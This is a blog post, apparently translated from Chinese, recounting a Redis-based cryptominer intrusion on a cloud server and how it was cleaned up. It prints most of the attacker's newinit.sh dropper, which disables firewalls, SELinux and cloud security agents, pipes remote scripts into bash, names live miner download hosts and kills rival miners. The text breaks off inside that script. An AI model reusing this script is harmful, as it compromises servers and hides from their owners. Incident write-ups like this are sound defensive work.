Friends, I have a Huawei Yunyao server, idle, installed a Redis on it, do some test research, the results were attacked, this is the first time to meet, because the environment before or use the Intranet mostly.
The phenomenon of description
Because I was busy late the first day and my computer was not turned off, SO I planned to clean the computer the next day and turn off the temporarily unused software. When I saw the FTP remote tool, I was full of energy. Take a look:
My server has only one mysql and one Redis, and it is not in use. How could it stain the memory and occupy half of the CPU? I immediately thought that I might be attacked.
Log in to huawei Cloud Console
The first thing that came to mind was to log on to the console and see, when did the attack start?
As you can see above it started around 22.40 the night before.
What surprises me is that Huawei cloud has no alarm mechanism? Suddenly a lot of traffic comes in, and the server memory is full, it does not have any message, but it shows no risk here:
Looking for problems
At present, the most important thing is to find out where the attack is, in fact, I know very well, it must be the redis installed yesterday. There are two main reasons:
- The security group allows entry access to all IP addresses
- No password set
So let’s see what happens in Redis?
When the client tool is connected, it finds that all the searched keys are missing, and the following content is changed:
In that case, let’s go to the Redis log file and see what happened to it. Where is the log? /dev/null: /dev/null: /dev/null: /dev/null
What does that mean? That tells me, who told you not to configure logging? There is no way to see it now.
To solve the problem
In that case, let’s get right to it. The first thing that comes to mind is the process that kills Redis directly:
[root@hecs-402944 myredis]# ps -ef|grep redisRoot 12810 10424 0 10:30 PTS /0 00:00:00 grep --color=auto redis root 21392 10 3月02? 00:01:19 redis-server *:6379 [root@hecs-402944 myredis]# kill -9 21392
Copy the codeAnd then you realize that it doesn’t really do anything, either CPU or memory is still high. I don’t even know how to fix it, so just restart the server. Rebooting is a great way to release occupied resources.
But after a while, the footprint went up again, so things must not be so simple. As you can see from the Redis script, the cron expression must have a scheduled task running continuously, so I follow this line to see what the scheduled task on the server is:
[root@hecs-402944 ~]# crontab -l
*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1
Copy the codeThere’s only one. That’s got to be it. Let’s stop it and see what it is.
[root@hecs-402944 etc]# rm -rf newinit.sh Rm: Cannot be deleted"newinit.sh": Disallowed operationCopy the codeI call the guy, not allowed to delete.
Use the following command to view the file:
lsattr newinit.sh
----ia-------e-- newinit.sh
Copy the codeWhat does this ia stand for?
A: Append Only. The system Only allows data to be appended to the file. No process is allowed to overwrite or truncate the file. If the directory has this property, the system will only allow the creation and modification of files in the directory, not delete any files. I: Immutable. The system does not allow any modification of this file. If the directory has this property, then any process can only modify files under the directory, not create or delete files.Copy the codeModify this permission:
[root@hecs-402944 etc]# chattr -ia newinit.sh -bash: /usr/bin/chattr: permission is insufficientCopy the codePermissions cannot be modified. To create a new chattr2, use the following method:
[root@hecs-402944 etc]# cp /usr/bin/chattr /usr/bin/chattr2
[root@hecs-402944 etc]# chmod 755 /usr/bin/chattr2
[root@hecs-402944 etc]# chattr2 -i /usr/bin/chattr
[root@hecs-402944 etc]# chmod 755 /usr/bin/chattr
[root@hecs-402944 etc]# ls -la /usr/bin/chattr -rwxr-xr-x 1 root root 11536 September 30 2020 /usr/bin/chattr [root@hecs-402944 etc]# lsattr /usr/bin/chattr
-------------e-- /usr/bin/chattr
Copy the codeIn this case, run chattr2 to modify the permission and delete the scheduled task file again.
chattr2 -ia newinit.sh
Copy the codeTo stop a scheduled task, you do not have permission.
[root@hecs-402944 etc]# lsattr /var/spool/cron/root
----ia-------e-- /var/spool/cron/root
[root@hecs-402944 etc]# chattr2 -ia /var/spool/cron/root
Copy the codeThe scheduled task is deleted
[root@hecs-402944 etc]# crontab -r
[root@hecs-402944 etc]# crontab -l
no crontab for root
Copy the codeRestart the server, and we’re done.
What does the scheduled task file do?
I’ll just stick it right here, guys. It’s amazing.
#! /bin/sh
ulimit -n 65535
chmod 777 /usr/bin/chattr
chmod 777 /bin/chattr
iptables -F
ufw disable
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
chattr -iua /tmp/
chattr -iua /var/tmp/
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
rm -rf /var/log/syslog
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/zzhs
rtdir="/etc/zzhs"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cd1"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wd1"
mv /usr/bin/wgettnt /usr/bin/wd1
mv /usr/bin/curltnt /usr/bin/cd1
mv /usr/bin/wget1 /usr/bin/wd1
mv /usr/bin/curl1 /usr/bin/cd1
mv /usr/bin/cur /usr/bin/cd1
mv /usr/bin/cdl /usr/bin/cd1
mv /usr/bin/cdt /usr/bin/cd1
mv /usr/bin/xget /usr/bin/wd1
mv /usr/bin/wge /usr/bin/wd1
mv /usr/bin/wdl /usr/bin/wd1
mv /usr/bin/wdt /usr/bin/wd1
mv /usr/bin/wget /usr/bin/wd1
mv /usr/bin/curl /usr/bin/cd1
if ps aux | grep -i '[a]liyun'; then
$bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash
$bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
$bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash
$bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
else
export ARCH=amd64
if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} ]; then
/usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} uninstall && rm -rf /usr/local/cloudmonitor
else
echo "ali cloud monitor not running"
fi
fi
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
miner_url="http://195.242.111.238/cleanfda/zzh"
miner_url_backup="http://en2an.top:8080/cleanfda/zzh"
miner_size="6006304"
sh_url="http://195.242.111.238/cleanfda/newinit.sh"
sh_url_backup="http://en2an.top:8080/cleanfda/newinit.sh"
chattr_size="8000"
sleep 1
if [ -x "$(command -v t)" ]; then
mv /usr/bin/t /usr/bin/chattr
fi
if [ -x "$(command -v chattr)" ]; then
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks
fi
sleep 1
kill_miner_proc() {netstat anp | grep 185.71.65.238 | awk'{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill- 9% netstat anp | grep 140.82.52.87 | awk'{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :10008 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
ps.original aux | grep -v grep | grep : '13531' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep : '3333' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep : '5555' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | awk '{if (substr ($11,1,2) = = ". / "&& substr ($12,1,2) = =". / ") print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3 > {print $10.0 2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "\ [^" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %
ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "[email protected]" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %
netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %
pgrep -f xzpauectgr | xargs -I % kill -9 %
pgrep -f slxfbkmxtd | xargs -I % kill -9 %
pgrep -f mixtape | xargs -I % kill -9 %
pgrep -f addnj | xargs -I % kill -9 %
pgrep -f 200.68.17.196 | xargs -I % kill -9 %
pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %
pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %
pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %
pgrep -f honvbsasbf.conf | xargs -I % kill -9 %
pgrep -f mqdsflm.cf | xargs -I % kill -9 %
pgrep -f lower.sh | xargs -I % kill -9 %
pgrep -f ./ppp | xargs -I % kill -9 %
pgrep -f cryptonight | xargs -I % kill -9 %
pgrep -f ./seervceaess | xargs -I % kill -9 %
pgrep -f ./servceaess | xargs -I % kill -9 %
pgrep -f ./servceas | xargs -I % kill -9 %
pgrep -f ./servcesa | xargs -I % kill -9 %
pgrep -f ./vsp | xargs -I % kill -9 %
pgrep -f ./jvs | xargs -I % kill -9 %
pgrep -f ./pvv | xargs -I % kill -9 %
pgrep -f ./vpp | xargs -I % kill -9 %
pgrep -f ./pces | xargs -I % kill -9 %
pgrep -f ./rspce | xargs -I % kill -9 %
pgrep -f ./haveged | xargs -I % kill -9 %
pgrep -f ./jiba | xargs -I % kill -9 %
pgrep -f ./watchbog | xargs -I % kill -9 %
pgrep -f ./A7mA5gb | xargs -I % kill -9 %
pgrep -f kacpi_svc | xargs -I % kill -9 %
pgrep -f kswap_svc | xargs -I % kill -9 %
pgrep -f kauditd_svc | xargs -I % kill -9 %
pgrep -f kpsmoused_svc | xargs -I % kill -9 %
pgrep -f kseriod_svc | xargs -I % kill -9 %
pgrep -f kthreadd_svc | xargs -I % kill -9 %
pgrep -f ksoftirqd_svc | xargs -I % kill -9 %
pgrep -f kintegrityd_svc | xargs -I % kill -9 %
pgrep -f jawa | xargs -I % kill -9 %
pgrep -f oracle.jpg | xargs -I % kill -9 %
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %
pgrep -f 188.209.49.54 | xargs -I % kill -9 %
pgrep -f 181.214.87.241 | xargs -I % kill -9 %
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %
pgrep -f servim | xargs -I % kill -9 %
pgrep -f kblockd_svc | xargs -I % kill -9 %
pgrep -f native_svc | xargs -I % kill -9 %
pgrep -f ynn | xargs -I % kill -9 %
pgrep -f 65ccEJ7 | xargs -I % kill -9 %
pgrep -f jmxx | xargs -I % kill -9 %
pgrep -f 2Ne80nA | xargs -I % kill -9 %
pgrep -f sysstats | xargs -I % kill -9 %
pgrep -f systemxlv | xargs -I % kill -9 %
pgrep -f watchbog | xargs -I % kill -9 %
pgrep -f OIcJi1m | xargs -I % kill-9 % pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f XJnRj pkill -f mgwsl pkill -f pythno pkill -f jweri pkill -f lx26 pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f polkitd pkill -f nanoWatch pkill -f zigw pkill -f devtool pkill -f devtools pkill -f systemctI pkill -f watchbog pkill -f cryptonight pkill -f sustes pkill -f xmrig pkill -f xmrig-cpu pkill -f 121.42.151.137 pkill -f init12.cfg pkill -f nginxk pkill -f TMP /wc.confz pkill -f XMrig -notls pkill -f XMR -stak pkill -f suppoie pkill -f zer0day.ru pkill -f dbus-daemon--system pkill -f nullcrew pkill -f systemctI pkill -f kworkerds pkill -f init10.cfg pkill -f /wl.conf pkill -f crond64 pkill -f sustse pkill -f vmlinuz pkill -f exin pkill -f apachiii pkill -f crypto pkill -f tntrecht pkill -f xr pkill -f svcupdate pkill -9 cnrig rm -rf /usr/bin/config.json rm -rf /usr/bin/exin rm -rf /tmp/wc.conf rm -rf /tmp/log_rot rm -rf /tmp/apachiii rm -rf /tmp/sustse rm -rf /tmp/php rm -rf /tmp/p2.conf rm -rf /tmp/pprt rm -rf /tmp/ppol rm -rf /tmp/javax/config.sh rm -rf /tmp/javax/sshd2 rm -rf /tmp/.profile rm -rf /tmp/1.so rm -rf /tmp/kworkerds rm -rf /tmp/kworkerds3 rm -rf /tmp/kworkerdssx rm -rf /tmp/xd.json rm -rf /tmp/syslogd rm -rf /tmp/syslogdb rm -rf /tmp/65ccEJ7 rm -rf /tmp/jmxx rm -rf /tmp/2Ne80nA rm -rf /tmp/dl rm -rf /tmp/ddg rm -rf /tmp/systemxlv rm -rf /tmp/systemctI rm -rf /tmp/.abc rm -rf /tmp/osw.hb rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/.java rm -rf /tmp/.omed rm -rf /tmp/.tmpc rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/gates.lod rm -rf /tmp/conf.n rm -rf /tmp/devtool rm -rf /tmp/devtools rm -rf /tmp/fs rm -rf /tmp/.rod rm -rf /tmp/.rod.tgz rm -rf /tmp/.rod.tgz.1 rm -rf /tmp/.rod.tgz.2 rm -rf /tmp/.mer rm -rf /tmp/.mer.tgz rm -rf /tmp/.mer.tgz.1 rm -rf /tmp/.hod rm -rf /tmp/.hod.tgz rm -rf /tmp/.hod.tgz.1 rm -rf /tmp/84Onmce rm -rf 